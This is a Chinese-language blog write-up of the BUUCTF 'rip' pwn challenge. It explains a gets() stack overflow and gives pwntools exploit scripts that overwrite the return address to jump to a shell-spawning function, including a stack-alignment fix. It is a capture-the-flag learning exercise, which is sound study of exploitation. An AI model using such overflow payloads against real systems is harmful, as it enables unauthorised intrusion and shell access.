BUUCTF-PWN-rip

139次阅读
没有评论

共计 575 个字符,预计需要花费 2 分钟才能阅读完成。

提醒:本文最后更新于 2024-08-27 15:39,文中所关联的信息可能已发生改变,请知悉!

BUUCTF-PWN-rip

checksec

BUUCTF-PWN-rip

IDA

BUUCTF-PWN-rip

很明显 gets 函数有溢出漏洞,s 的栈情况如下:

BUUCTF-PWN-rip

完全覆盖需要(0xF + 0x8)的长度

BUUCTF-PWN-rip

找到函数 fun(可以直接拿到 shell)

fun_addr: 0x401186

BUUCTF-PWN-rip

测试 EXP

from pwn import *

# p = process('./pwn1')
p = remote('node4.buuoj.cn', 27723)

payload = b'a' * (0xF + 8) + p64(0x401186)

# p.recv()
p.sendline(payload)
p.interactive()

测试结果

BUUCTF-PWN-rip

测试结果是打通了,但是报 timeout,于是去找原因:

参考文章:http://blog.eonew.cn/archives/958

主要原因文章中提到了,是因为没有对齐,所以根据文章中的解决方案:

BUUCTF-PWN-rip

最终 EXP

from pwn import *

# p = process('./pwn1')
p = remote('node4.buuoj.cn', 27723)

payload = b'a' * (0xF + 8) + p64(0x401187) # 在原来的地址上 + 1 刚刚好

# p.recv()
p.sendline(payload)
p.interactive()

结果

BUUCTF-PWN-rip

正文完
 0
icvuln
版权声明:本站原创文章,由 icvuln 于2021-11-02发表,共计575字。
转载说明:除特殊说明外本站文章皆由CC-4.0协议发布,转载请注明出处。
评论(没有评论)